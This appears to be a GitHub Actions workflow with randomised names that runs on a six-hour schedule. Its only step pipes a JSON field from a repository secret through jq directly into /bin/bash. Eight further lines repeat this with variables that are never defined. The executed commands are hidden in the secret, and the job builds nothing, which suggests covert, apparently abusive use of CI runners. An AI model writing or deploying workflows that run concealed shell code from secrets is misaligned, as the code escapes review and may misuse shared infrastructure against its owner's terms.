name: pengbaiyu2901
on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pengbaiyu2901
        env:
          bn177: ${{ secrets.bn177 }}
        run: |
          echo $bn177 | jq -r .ony8 | /bin/bash
          echo $cgg3 | jq -r .bdapc6137 | /bin/bash
          echo $ksnxm349 | jq -r .j80514 | /bin/bash
          echo $whdtt6421 | jq -r .oys220 | /bin/bash
          echo $becwa1221 | jq -r .c2 | /bin/bash
          echo $l61287 | jq -r .hfuym513 | /bin/bash
          echo $hxqn0378 | jq -r .e18998 | /bin/bash
          echo $g3597 | jq -r .yffx7208 | /bin/bash
          echo $jeldt8946 | jq -r .p506 | /bin/bash

